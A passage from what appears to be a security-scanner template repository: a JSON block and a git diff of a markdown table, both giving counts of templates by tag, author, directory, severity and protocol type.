},{"name":"sast","count":1},{"name":"zm","count":1},{"name":"natemail","count":1},{"name":"zenario","count":1},{"name":"key","count":1},{"name":"cloudinary","count":1},{"name":"zookeeper","count":1},{"name":"whm","count":1},{"name":"syslog","count":1},{"name":"route","count":1},{"name":"lg-nas","count":1},{"name":"gurock","count":1},{"name":"domxss","count":1},{"name":"directions","count":1},{"name":"ulterius","count":1},{"name":"goahead","count":1},{"name":"matrix","count":1},{"name":"solarlog","count":1},{"name":"details","count":1},{"name":"adb","count":1},{"name":"netdata","count":1},{"name":"mpsec","count":1},{"name":"cscart","count":1},{"name":"buttercms","count":1},{"name":"fastapi","count":1},{"name":"webftp","count":1},{"name":"cgi","count":1},{"name":"visualtools","count":1},{"name":"kubeflow","count":1},{"name":"dotclear","count":1},{"name":"vidyo","count":1},{"name":"bedita","count":1},{"name":"onelogin","count":1},{"name":"drone","count":1},{"name":"jeewms","count":1},{"name":"asana","count":1},{"name":"weather","count":1},{"name":"zte","count":1},{"name":"plc","count":1},{"name":"autocomplete","count":1},{"name":"swagger","count":1},{"name":"eyou","count":1},{"name":"photo","count":1},{"name":"primetek","count":1},{"name":"facebook","count":1},{"name":"xvr","count":1},{"name":"faraday","count":1},{"name":"shoretel","count":1},{"name":"panabit","count":1},{"name":"sar2html","count":1},{"name":"postmessage","count":1},{"name":"daybyday","count":1},{"name":"maxsite","count":1},{"name":"micro-user-service","count":1},{"name":"robomongo","count":1},{"name":"sgp","count":1},{"name":"openx","count":1},{"name":"pyramid","count":1},{"name":"fedora","count":1},{"name":"nps","count":1},{"name":"soar","count":1},{"name":"sentry","count":1},{"name":"arl","count":1},{"name":"intercom","count":1},{"name":"loganalyzer","count":1},{"name":"centos","count":1},{"name":"opencast","count":1},{"name":"wifisky","count":1},{"name":"adafruit","count":1},{"name":"parentlink","count":1},{"name":"fortigates","count":1},{"name":"oscommerce","count":1},{"name":"geutebruck","count":1},{"name":"h3c-imc","count":1},{"name":"bash","count":1},{"name":"mrtg","count":1},{"name":"office365","count":1},{"name":"keenetic","count":1},{"name":"cooperhewitt","count":1},{"name":"mariadb","count":1},{"name":"subrion","count":1},{"name":"tpshop","count":1},{"name":"loqate","count":1},{"name":"redmine","count":1},{"name":"xiuno","count":1},{"name":"iucn","count":1},{"name":"zmanda","count":1},{"name":"circle","count":1},{"name":"secmail","count":1},{"name":"fastcgi","count":1},{"name":"sqlite","count":1},{"name":"wooyun","count":1},{"name":"idemia","count":1},{"name":"mailgun","count":1},{"name":"metinfo","count":1},{"name":"mysql","count":1},{"name":"majordomo2","count":1},{"name":"qvisdvr","count":1},{"name":"shoppable","count":1},{"name":"avtech","count":1},{"name":"argussurveillance","count":1},{"name":"mirai","count":1},{"name":"sangfor","count":1},{"name":"ioncube","count":1},{"name":"gitlist","count":1},{"name":"bingmaps","count":1},{"name":"ecom","count":1},{"name":"k8s","count":1},{"name":"webctrl","count":1},{"name":"tapestry","count":1},{"name":"krweb","count":1},{"name":"monitorix","count":1},{"name":"testrail","count":1},{"name":"nweb2fax","count":1},{"name":"netlify","count":1},{"name":"tcexam","count":1},{"name":"crm","count":1},{"name":"meraki","count":1},{"name":"xampp","count":1},{"name":"tinymce","count":1},{"name":"doh","count":1},{"name":"zcms","count":1},{"name":"wildfly","count":1},{"name":"trane","count":1},{"name":"frontpage","count":1},{"name":"addpac","count":1},{"name":"svnserve","count":1},{"name":"turbocrm","count":1},{"name":"eprints","count":1},{"name":"apos","count":1},{"name":"redcap","count":1},{"name":"sceditor","count":1},{"name":"logontracer","count":1},{"name":"mautic","count":1},{"name":"opm","count":1},{"name":"cherokee","count":1},{"name":"nsasg","count":1},{"name":"geocode","count":1},{"name":"tink","count":1},{"name":"nerdgraph","count":1},{"name":"rsyncd","count":1},{"name":"totaljs","count":1},{"name":"chinaunicom","count":1},{"name":"skycaiji","count":1},{"name":"servicenow","count":1},{"name":"sugarcrm","count":1},{"name":"gespage","count":1},{"name":"hortonworks","count":1},{"name":"monitorr","count":1},{"name":"achecker","count":1},{"name":"ns","count":1},{"name":"bookstack","count":1},{"name":"vercel","count":1},{"name":"proftpd","count":1},{"name":"interlib","count":1},{"name":"jenzabar","count":1},{"name":"karel","count":1},{"name":"codemeter","count":1},{"name":"tracer","count":1},{"name":"ntopng","count":1},{"name":"oidc","count":1},{"name":"shiro","count":1},{"name":"yealink","count":1},{"name":"instagram","count":1},{"name":"graph","count":1},{"name":"htmli","count":1},{"name":"twitter","count":1},{"name":"square","count":1},{"name":"b2evolution","count":1},{"name":"clockwatch","count":1},{"name":"ambari","count":1},{"name":"clickhouse","count":1},{"name":"kerbynet","count":1},{"name":"eg","count":1},{"name":"kafdrop","count":1},{"name":"dnn","count":1},{"name":"postmark","count":1},{"name":"vanguard","count":1},{"name":"trilithic","count":1},{"name":"miscrsoft","count":1},{"name":"rhymix","count":1},{"name":"cors","count":1},{"name":"owasp","count":1},{"name":"klog","count":1},{"name":"nuuo","count":1},{"name":"sidekiq","count":1},{"name":"urlscan","count":1},{"name":"rujjie","count":1},{"name":"pulsesecure","count":1},{"name":"pivotaltracker","count":1},{"name":"clusterengine","count":1},{"name":"sco","count":1},{"name":"xdcms","count":1},{"name":"emby","count":1},{"name":"kodi","count":1},{"name":"email","count":1},{"name":"burp","count":1},{"name":"vnc","count":1},{"name":"wondercms","count":1},{"name":"livezilla","count":1},{"name":"shopware","count":1},{"name":"jnoj","count":1},{"name":"seeddms","count":1},{"name":"visualstudio","count":1},{"name":"viewpoint","count":1},{"name":"springframework","count":1},{"name":"circontrorl","count":1},{"name":"novnc","count":1},{"name":"realteo","count":1},{"name":"shopizer","count":1},{"name":"fortigate","count":1},{"name":"iterable","count":1},{"name":"find","count":1},{"name":"timesheet","count":1},{"name":"craftcms","count":1},{"name":"gogs","count":1},{"name":"alertmanager","count":1},{"name":"alienvault","count":1},{"name":"gotmls","count":1},{"name":"securityspy","count":1},{"name":"servicedesk","count":1},{"name":"place","count":1},{"name":"europeana","count":1},{"name":"apigee","count":1},{"name":"zend","count":1},{"name":"fuelcms","count":1},{"name":"locations","count":1},{"name":"geolocation","count":1},{"name":"haproxy","count":1},{"name":"postgres","count":1},{"name":"node-red-dashboard","count":1},{"name":"starttls","count":1}],"authors":[{"name":"dhiyaneshdk","count":315},{"name":"daffainfo","count":308},{"name":"pikpikcu","count":281},{"name":"pdteam","count":209},{"name":"geeknik","count":172},{"name":"dwisiswant0","count":152},{"name":"gy741","count":85},{"name":"pussycat0x","count":77},{"name":"princechaddha","count":67},{"name":"madrobot","count":65},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":62},{"name":"gaurang","count":42},{"name":"philippedelteil","count":31},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"zh","count":8},{"name":"emadshanab","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"meme-lord","count":8},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"johnk3r","count":6},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"panch0r3d","count":5},{"name":"iamnoooob","count":5},{"name":"lu4nx","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"xelkomy","count":5},{"name":"yanyun","count":5},{"name":"e_schultze_","count":4},{"name":"leovalcante","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"wisnupramoedya","count":4},{"name":"tess","count":4},{"name":"mavericknerd","count":3},{"name":"forgedhallpass","count":3},{"name":"jarijaas","count":3},{"name":"sushantkamble","count":3},{"name":"johnjhacking","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"shifacyclewala","count":3},{"name":"sullo","count":3},{"name":"z3bd","count":3},{"name":"github.com/its0x08","count":3},{"name":"_generic_human_","count":3},{"name":"0w4ys","count":3},{"name":"fyoorer","count":3},{"name":"alifathi-h1","count":3},{"name":"andydoering","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"me9187","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"idealphase","count":3},{"name":"skeltavik","count":3},{"name":"unstabl3","count":3},{"name":"its0x08","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"nkxxkn","count":2},{"name":"whoever","count":2},{"name":"zomsop82","count":2},{"name":"hahwul","count":2},{"name":"r12w4n","count":2},{"name":"x1m_martijn","count":2},{"name":"sy3omda","count":2},{"name":"hetroublemakr","count":2},{"name":"joeldeleep","count":2},{"name":"parth","count":2},{"name":"0xsapra","count":2},{"name":"swissky","count":2},{"name":"ree4pwn","count":2},{"name":"lark-lab","count":2},{"name":"arcc","count":2},{"name":"g4l1t0","count":2},{"name":"amsda","count":2},{"name":"huowuzhao","count":2},{"name":"convisoappsec","count":2},{"name":"0xprial","count":2},{"name":"bsysop","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"moritz nentwig","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"w4cky_","count":2},{"name":"mohammedsaneem","count":2},{"name":"lotusdll","count":2},{"name":"alph4byt3","count":2},{"name":"vavkamil","count":2},{"name":"_0xf4n9x_","count":2},{"name":"0xcrypto","count":2},{"name":"0xrudra","count":2},{"name":"gal nagli","count":2},{"name":"kiblyn11","count":2},{"name":"foulenzer","count":2},{"name":"koti2","count":2},{"name":"0xelkomy","count":2},{"name":"0xsmiley","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"afaq","count":2},{"name":"fabaff","count":2},{"name":"dheerajmadhukar","count":2},{"name":"bing0o","count":2},{"name":"bp0lr","count":2},{"name":"martincodes-de","count":2},{"name":"cocxanh","count":2},{"name":"pxmme1337","count":2},{"name":"udit_thakkur","count":2},{"name":"socketz","count":2},{"name":"dahse89","count":2},{"name":"randomrobbie","count":2},{"name":"bernardofsr","count":2},{"name":"ehsahil","count":2},{"name":"davidmckennirey","count":2},{"name":"yavolo","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"0xd0ff9","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"yuansec","count":1},{"name":"0xtavian","count":1},{"name":"remonsec","count":1},{"name":"juicypotato1","count":1},{"name":"mesaglio","count":1},{"name":"shelld3v","count":1},{"name":"brabbit10","count":1},{"name":"igibanez","count":1},{"name":"adrianmf","count":1},{"name":"kareemse1im","count":1},{"name":"soyelmago","count":1},{"name":"hakluke","count":1},{"name":"@ofjaaah","count":1},{"name":"sickwell","count":1},{"name":"bolli95","count":1},{"name":"cookiehanhoan","count":1},{"name":"yashgoti","count":1},{"name":"yashanand155","count":1},{"name":"retr0","count":1},{"name":"nvn1729","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"bad5ect0r","count":1},{"name":"@dwisiswant0","count":1},{"name":"elouhi","count":1},{"name":"alperenkesk","count":1},{"name":"c3l3si4n","count":1},{"name":"rojanrijal","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"husain","count":1},{"name":"chron0x","count":1},{"name":"undefl0w","count":1},{"name":"clarkvoss","count":1},{"name":"luskabol","count":1},{"name":"bjhulst","count":1},{"name":"berkdusunur","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"dawid-czarnecki","count":1},{"name":"pudsec","count":1},{"name":"akash.c","count":1},{"name":"oscarintherocks","count":1},{"name":"charanrayudu","count":1},{"name":"flag007","count":1},{"name":"b0rn2r00t","count":1},{"name":"ilovebinbash","count":1},{"name":"notsoevilweasel","count":1},{"name":"makyotox","count":1},{"name":"push4d","count":1},{"name":"luci","count":1},{"name":"nytr0gen","count":1},{"name":"co0nan","count":1},{"name":"0xteles","count":1},{"name":"droberson","count":1},{"name":"ooooooo_q","count":1},{"name":"majidmc2","count":1},{"name":"qlkwej","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"philippdelteil","count":1},{"name":"orpheus","count":1},{"name":"gboddin","count":1},{"name":"borna nematzadeh","count":1},{"name":"taielab","count":1},{"name":"smaranchand","count":1},{"name":"streetofhackerr007","count":1},{"name":"fopina","count":1},{"name":"schniggie","count":1},{"name":"th3.d1p4k","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"rotemreiss","count":1},{"name":"kre80r","count":1},{"name":"jeya seelan","count":1},{"name":"thevillagehacker","count":1},{"name":"raesene","count":1},{"name":"becivells","count":1},{"name":"ahmetpergamum","count":1},{"name":"patralos","count":1},{"name":"_darrenmartyn","count":1},{"name":"andysvints","count":1},{"name":"sicksec","count":1},{"name":"jteles","count":1},{"name":"ringo","count":1},{"name":"j33n1k4","count":1},{"name":"d0rkerdevil","count":1},{"name":"zhenwarx","count":1},{"name":"ajaysenr","count":1},{"name":"udyz","count":1},{"name":"0xrod","count":1},{"name":"exploitation","count":1},{"name":"toufik airane","count":1},{"name":"manuelbua","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"nerrorsec","count":1},{"name":"52971","count":1},{"name":"lethargynavigator","count":1},{"name":"s1r1u5_","count":1},{"name":"knassar702","count":1},{"name":"blckraven","count":1},{"name":"mubassirpatel","count":1},{"name":"ldionmarcil","count":1},{"name":"thezakman","count":1},{"name":"kaizensecurity","count":1},{"name":"sshell","count":1},{"name":"pdp","count":1},{"name":"_c0wb0y_","count":1},{"name":"mah3sec_","count":1},{"name":"wabafet","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"0h1in9e","count":1},{"name":"tirtha_mandal","count":1},{"name":"geraldino2","count":1},{"name":"pratik khalane","count":1},{"name":"un-fmunozs","count":1},{"name":"thebinitghimire","count":1},{"name":"aresx","count":1},{"name":"b4uh0lz","count":1},{"name":"absshax","count":1},{"name":"jiheon-dev","count":1},{"name":"tim_koopmans","count":1},{"name":"micha3lb3n","count":1},{"name":"izn0u","count":1},{"name":"daviey","count":1},{"name":"deena","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"elder tao","count":1},{"name":"ipanda","count":1},{"name":"whynotke","count":1},{"name":"naglinagli","count":1},{"name":"harshinsecurity","count":1},{"name":"defr0ggy","count":1},{"name":"mhdsamx","count":1},{"name":"affix","count":1},{"name":"fmunozs","count":1},{"name":"noamrathaus","count":1},{"name":"shifacyclewla","count":1},{"name":"sbani","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"iampritam","count":1},{"name":"akshansh","count":1},{"name":"intx0x80","count":1},{"name":"mass0ma","count":1},{"name":"ohlinge","count":1},{"name":"vzamanillo","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"revblock","count":1},{"name":"petruknisme","count":1},{"name":"florianmaak","count":1},{"name":"jrolf","count":1},{"name":"willd96","count":1},{"name":"evolutionsec","count":1},{"name":"sec_hawk","count":1},{"name":"xstp","count":1},{"name":"imnightmaree","count":1},{"name":"rodnt","count":1},{"name":"kabirsuda","count":1},{"name":"omarkurt","count":1},{"name":"alex","count":1},{"name":"0xh7ml","count":1},{"name":"zandros0","count":1},{"name":"andirrahmani1","count":1},{"name":"elmahdi","count":1},{"name":"furkansenan","count":1},{"name":"retr02332","count":1},{"name":"infosecsanyam","count":1},{"name":"lark lab","count":1},{"name":"_harleo","count":1},{"name":"shreyapohekar","count":1},{"name":"b0yd","count":1},{"name":"x6263","count":1},{"name":"apt-mirror","count":1},{"name":"kurohost","count":1},{"name":"ahmed sherif","count":1},{"name":"0ut0fb4nd","count":1}],"directory":[{"name":"cves","count":864},{"name":"vulnerabilities","count":334},{"name":"exposed-panels","count":291},{"name":"technologies","count":211},{"name":"exposures","count":199},{"name":"misconfiguration","count":151},{"name":"token-spray","count":102},{"name":"takeovers","count":66},{"name":"default-logins","count":61},{"name":"file","count":57},{"name":"workflows","count":43},{"name":"iot","count":36},{"name":"network","count":33},{"name":"miscellaneous","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":10},{"name":"headless","count":5}],"severity":[{"name":"info","count":841},{"name":"high","count":663},{"name":"medium","count":498},{"name":"critical","count":305},{"name":"low","count":158}],"types":[{"name":"http","count":2345},{"name":"file","count":57},{"name":"network","count":46},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 2467bd2d28..6746d916ea 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,989 +1,999 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 852 | dhiyaneshdk | 309 | cves | 856 | info | 833 | http | 2326 | -| lfi | 350 | daffainfo | 304 | vulnerabilities | 333 | high | 659 | file | 57 | -| panel | 295 | pikpikcu | 281 | exposed-panels | 289 | medium | 493 | network | 46 | -| xss | 266 | pdteam | 208 | technologies | 210 | critical | 303 | dns | 12 | -| wordpress | 262 | geeknik | 172 | exposures | 199 | low | 158 | | | -| exposure | 250 | dwisiswant0 | 152 | misconfiguration | 148 | | | | | -| rce | 221 | gy741 | 85 | token-spray | 98 | | | | | -| tech | 204 | pussycat0x | 76 | takeovers | 66 | | | | | -| wp-plugin | 180 | princechaddha | 67 | default-logins | 61 | | | | | -| cve2021 | 166 | madrobot | 65 | file | 57 | | | | | -| cve2020 | 166 | zzeitlin | 63 | workflows | 42 | | | | | -| joomla | 128 | 0x_akoko | 60 | iot | 36 | | | | | +| cve | 859 | dhiyaneshdk | 315 | cves | 864 | info | 841 | http | 2345 | +| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 | +| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 498 | network | 46 | +| xss | 268 | pdteam | 209 | technologies | 211 | critical | 305 | dns | 12 | +| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | | +| exposure | 252 | dwisiswant0 | 152 | misconfiguration | 151 | | | | | +| rce | 222 | gy741 | 85 | token-spray | 102 | | | | | +| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | | +| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | | +| cve2021 | 168 | madrobot | 65 | file | 57 | | | | | +| cve2020 | 166 | zzeitlin | 63 | workflows | 43 | | | | | +| joomla | 128 | 0x_akoko | 62 | iot | 36 | | | | | | cve2010 | 109 | gaurang | 42 | network | 33 | | | | | -| config | 99 | philippedelteil | 31 | miscellaneous | 23 | | | | | -| cve2019 | 99 | ice3man | 26 | dns | 12 | | | | | -| token-spray | 98 | organiccrap | 24 | fuzzing | 10 | | | | | -| cve2018 | 93 | pr3r00t | 15 | cnvd | 10 | | | | | +| token-spray | 102 | philippedelteil | 31 | miscellaneous | 23 | | | | | +| cve2019 | 102 | ice3man | 26 | dns | 12 | | | | | +| config | 100 | organiccrap | 24 | cnvd | 10 | | | | | +| cve2018 | 94 | pr3r00t | 15 | fuzzing | 10 | | | | | | iot | 81 | sheikhrishad | 15 | headless | 5 | | | | | -| apache | 75 | milo2012 | 14 | | | | | | | -| oast | 74 | techbrunchfr | 13 | | | | | | | +| oast | 75 | milo2012 | 14 | | | | | | | +| apache | 75 | techbrunchfr | 13 | | | | | | | | takeover | 70 | suman_kar | 12 | | | | | | | | default-login | 69 | r3dg33k | 12 | | | | | | | | token | 68 | cyllective | 11 | | | | | | | -| file | 57 | hackergautam | 10 | | | | | | | -| cve2017 | 52 | righettod | 10 | | | | | | | -| unauth | 50 | wdahlenb | 10 | | | | | | | -| network | 44 | melbadry9 | 10 | | | | | | | +| file | 57 | wdahlenb | 10 | | | | | | | +| cve2017 | 53 | righettod | 10 | | | | | | | +| unauth | 51 | hackergautam | 10 | | | | | | | | ssrf | 44 | random_robbie | 10 | | | | | | | -| | 42 | nadino | 10 | | | | | | | -| sqli | 41 | zh | 8 | | | | | | | +| network | 44 | melbadry9 | 10 | | | | | | | +| | 43 | nadino | 10 | | | | | | | +| sqli | 42 | zh | 8 | | | | | | | +| oracle | 40 | meme-lord | 8 | | | | | | | | cve2016 | 39 | aashiq | 8 | | | | | | | -| redirect | 38 | that_juan_ | 8 | | | | | | | -| oracle | 37 | iamthefrogy | 8 | | | | | | | -| logs | 35 | emadshanab | 8 | | | | | | | -| google | 30 | meme-lord | 8 | | | | | | | -| cve2015 | 30 | oppsec | 7 | | | | | | | -| misconfig | 30 | techryptic (@tech) | 7 | | | | | | | -| atlassian | 29 | harshbothra_ | 7 | | | | | | | -| jira | 29 | 0x240x23elu | 7 | | | | | | | -| cisco | 28 | randomstr1ng | 7 | | | | | | | -| listing | 27 | dogasantos | 7 | | | | | | | +| redirect | 38 | emadshanab | 8 | | | | | | | +| logs | 35 | that_juan_ | 8 | | | | | | | +| misconfig | 33 | iamthefrogy | 8 | | | | | | | +| google | 30 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 30 | harshbothra_ | 7 | | | | | | | +| atlassian | 29 | randomstr1ng | 7 | | | | | | | +| jira | 29 | dogasantos | 7 | | | | | | | +| cisco | 28 | dr_set | 7 | | | | | | | +| listing | 27 | oppsec | 7 | | | | | | | +| auth-bypass | 27 | techryptic (@tech) | 7 | | | | | | | | cve2014 | 27 | kophjager007 | 7 | | | | | | | -| auth-bypass | 25 | dr_set | 7 | | | | | | | | generic | 24 | puzzlepeaches | 6 | | | | | | | -| misc | 22 | pentest_swissky | 6 | | | | | | | | disclosure | 22 | __fazal | 6 | | | | | | | -| router | 22 | caspergn | 6 | | | | | | | -| aem | 19 | divya_mudgal | 6 | | | | | | | -| debug | 18 | logicalhunter | 6 | | | | | | | -| sap | 18 | johnk3r | 6 | | | | | | | -| springboot | 18 | panch0r3d | 5 | | | | | | | -| cve2012 | 18 | yanyun | 5 | | | | | | | +| router | 22 | johnk3r | 6 | | | | | | | +| misc | 22 | pentest_swissky | 6 | | | | | | | +| aem | 19 | caspergn | 6 | | | | | | | +| cve2012 | 18 | logicalhunter | 6 | | | | | | | +| springboot | 18 | divya_mudgal | 6 | | | | | | | +| debug | 18 | elsfa7110 | 5 | | | | | | | +| sap | 18 | yanyun | 5 | | | | | | | +| weblogic | 16 | xelkomy | 5 | | | | | | | +| cve2011 | 15 | ganofins | 5 | | | | | | | +| devops | 15 | panch0r3d | 5 | | | | | | | +| aws | 15 | joanbono | 5 | | | | | | | | fuzz | 15 | rootxharsh | 5 | | | | | | | -| cve2011 | 15 | joanbono | 5 | | | | | | | -| wp-theme | 15 | xelkomy | 5 | | | | | | | +| wp-theme | 15 | iamnoooob | 5 | | | | | | | | php | 15 | lu4nx | 5 | | | | | | | -| aws | 15 | elsfa7110 | 5 | | | | | | | -| weblogic | 15 | ganofins | 5 | | | | | | | -| devops | 15 | iamnoooob | 5 | | | | | | | -| cve2009 | 14 | tess | 4 | | | | | | | -| login | 14 | e_schultze_ | 4 | | | | | | | +| login | 14 | incogbyte | 4 | | | | | | | +| struts | 14 | tess | 4 | | | | | | | | deserialization | 14 | wisnupramoedya | 4 | | | | | | | -| struts | 14 | nodauf | 4 | | | | | | | -| android | 13 | incogbyte | 4 | | | | | | | -| zoho | 13 | unstabl3 | 3 | | | | | | | -| dns | 13 | _generic_human_ | 3 | | | | | | | -| adobe | 13 | mavericknerd | 3 | | | | | | | -| dlink | 13 | johnjhacking | 3 | | | | | | | -| jenkins | 12 | yash anand @yashanand155 | 3 | | | | | | | -| manageengine | 12 | f1tz | 3 | | | | | | | -| cve2013 | 11 | sullo | 3 | | | | | | | -| intrusive | 11 | z3bd | 3 | | | | | | | -| xxe | 11 | andydoering | 3 | | | | | | | -| magento | 11 | forgedhallpass | 3 | | | | | | | -| hp | 10 | vsh00t | 3 | | | | | | | -| dell | 10 | alifathi-h1 | 3 | | | | | | | -| rails | 9 | skeltavik | 3 | | | | | | | -| kubernetes | 9 | shine | 3 | | | | | | | -| ibm | 9 | 0w4ys | 3 | | | | | | | -| gitlab | 9 | impramodsargar | 3 | | | | | | | -| vmware | 9 | idealphase | 3 | | | | | | | -| ftp | 9 | thomas_from_offensity | 3 | | | | | | | -| nginx | 8 | shifacyclewala | 3 | | | | | | | -| backup | 8 | fyoorer | 3 | | | | | | | -| airflow | 8 | me9187 | 3 | | | | | | | -| microsoft | 8 | emenalf | 3 | | | | | | | -| cnvd | 8 | sushantkamble | 3 | | | | | | | -| cve2008 | 8 | dudez | 3 | | | | | | | -| scada | 8 | jarijaas | 3 | | | | | | | -| fastjson | 8 | binaryfigments | 3 | | | | | | | -| ruijie | 8 | github.com/its0x08 | 3 | | | | | | | -| cms | 7 | convisoappsec | 2 | | | | | | | -| confluence | 7 | lotusdll | 2 | | | | | | | -| files | 7 | moritz nentwig | 2 | | | | | | | -| camera | 7 | kiblyn11 | 2 | | | | | | | -| netgear | 7 | lark-lab | 2 | | | | | | | -| coldfusion | 7 | bernardofsr | 2 | | | | | | | -| django | 7 | hetroublemakr | 2 | | | | | | | -| laravel | 6 | hahwul | 2 | | | | | | | -| drupal | 6 | davidmckennirey | 2 | | | | | | | -| docker | 6 | mohammedsaneem | 2 | | | | | | | -| lucee | 6 | arcc | 2 | | | | | | | -| prometheus | 6 | 0xprial | 2 | | | | | | | -| phpmyadmin | 6 | gevakun | 2 | | | | | | | -| api | 6 | nkxxkn | 2 | | | | | | | -| jetty | 6 | vavkamil | 2 | | | | | | | -| solr | 6 | bing0o | 2 | | | | | | | -| fileupload | 6 | udit_thakkur | 2 | | | | | | | -| nodejs | 6 | pxmme1337 | 2 | | | | | | | -| rconfig | 6 | afaq | 2 | | | | | | | -| citrix | 6 | r12w4n | 2 | | | | | | | -| sitecore | 6 | fabaff | 2 | | | | | | | +| cve2009 | 14 | nodauf | 4 | | | | | | | +| adobe | 13 | leovalcante | 4 | | | | | | | +| dns | 13 | e_schultze_ | 4 | | | | | | | +| zoho | 13 | 0w4ys | 3 | | | | | | | +| android | 13 | forgedhallpass | 3 | | | | | | | +| dlink | 13 | z3bd | 3 | | | | | | | +| jenkins | 12 | fyoorer | 3 | | | | | | | +| manageengine | 12 | johnjhacking | 3 | | | | | | | +| xxe | 11 | me9187 | 3 | | | | | | | +| magento | 11 | sullo | 3 | | | | | | | +| intrusive | 11 | andydoering | 3 | | | | | | | +| cve2013 | 11 | impramodsargar | 3 | | | | | | | +| dell | 10 | sushantkamble | 3 | | | | | | | +| hp | 10 | github.com/its0x08 | 3 | | | | | | | +| fastjson | 9 | binaryfigments | 3 | | | | | | | +| ftp | 9 | f1tz | 3 | | | | | | | +| vmware | 9 | dudez | 3 | | | | | | | +| gitlab | 9 | yash anand @yashanand155 | 3 | | | | | | | +| ibm | 9 | skeltavik | 3 | | | | | | | +| rails | 9 | idealphase | 3 | | | | | | | +| kubernetes | 9 | thomas_from_offensity | 3 | | | | | | | +| backup | 8 | _generic_human_ | 3 | | | | | | | +| cve2008 | 8 | vsh00t | 3 | | | | | | | +| nginx | 8 | emenalf | 3 | | | | | | | +| cnvd | 8 | alifathi-h1 | 3 | | | | | | | +| ruijie | 8 | jarijaas | 3 | | | | | | | +| airflow | 8 | shifacyclewala | 3 | | | | | | | +| microsoft | 8 | unstabl3 | 3 | | | | | | | +| scada | 8 | shine | 3 | | | | | | | +| coldfusion | 7 | mavericknerd | 3 | | | | | | | +| camera | 7 | lotusdll | 2 | | | | | | | +| files | 7 | lark-lab | 2 | | | | | | | +| netgear | 7 | koti2 | 2 | | | | | | | +| django | 7 | bernardofsr | 2 | | | | | | | +| solr | 7 | 0xrudra | 2 | | | | | | | +| confluence | 7 | gal nagli | 2 | | | | | | | +| cms | 7 | its0x08 | 2 | | | | | | | +| laravel | 6 | g4l1t0 | 2 | | | | | | | +| sitecore | 6 | convisoappsec | 2 | | | | | | | +| citrix | 6 | joeldeleep | 2 | | | | | | | +| prometheus | 6 | 0xcrypto | 2 | | | | | | | +| api | 6 | sy3omda | 2 | | | | | | | +| docker | 6 | afaq | 2 | | | | | | | +| fileupload | 6 | foulenzer | 2 | | | | | | | +| lucee | 6 | 0xsmiley | 2 | | | | | | | +| phpmyadmin | 6 | _0xf4n9x_ | 2 | | | | | | | +| nodejs | 6 | alph4byt3 | 2 | | | | | | | +| jetty | 6 | parth | 2 | | | | | | | +| rconfig | 6 | whoever | 2 | | | | | | | +| drupal | 6 | arcc | 2 | | | | | | | +| jolokia | 5 | gevakun | 2 | | | | | | | +| java | 5 | 0xsapra | 2 | | | | | | | +| gocd | 5 | hetroublemakr | 2 | | | | | | | +| iis | 5 | bing0o | 2 | | | | | | | +| wso2 | 5 | amsda | 2 | | | | | | | +| windows | 5 | hahwul | 2 | | | | | | | +| dedecms | 5 | r12w4n | 2 | | | | | | | +| go | 5 | dheerajmadhukar | 2 | | | | | | | +| circarlife | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| symfony | 5 | socketz | 2 | | | 